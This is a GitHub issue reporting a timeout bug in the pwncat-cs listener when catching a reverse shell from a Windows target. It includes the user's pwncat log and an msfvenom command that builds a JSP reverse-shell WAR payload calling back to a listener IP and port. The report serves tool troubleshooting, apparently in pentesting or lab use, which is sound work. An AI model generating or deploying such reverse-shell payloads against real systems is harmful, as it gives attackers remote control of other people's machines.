Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

connection failed: channel receive timed out: b #292

Open
vishwow opened this issue Dec 16, 2024 · 0 comments
Open

connection failed: channel receive timed out: b #292

vishwow opened this issue Dec 16, 2024 · 0 comments
Labels
bug Something isn't working

Comments

@vishwow
Copy link

vishwow commented Dec 16, 2024

I'm trying to get shell from windows system for the below exploit. But it seems like pwncat-cs issue, same is working well with nc listenere. I tried using different attack machines like Kali as well, but no luck. I tried sending nc to pwncat, still same issue. Not sure if it's target platform issue. Worth to look into it. Thank you.

MSF Venom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=4444 -f war > reverse.war

pwncat-cs -m windows -lp 4444
[08:08:53] Welcome to pwncat 🐈! main.py:164
[08:09:26] received connection from 127.0.0.1:59726 bind.py:84
[08:09:56] connection failed: channel receive timed out: b''

@vishwow vishwow added the bug Something isn't working label Dec 16, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

1 participant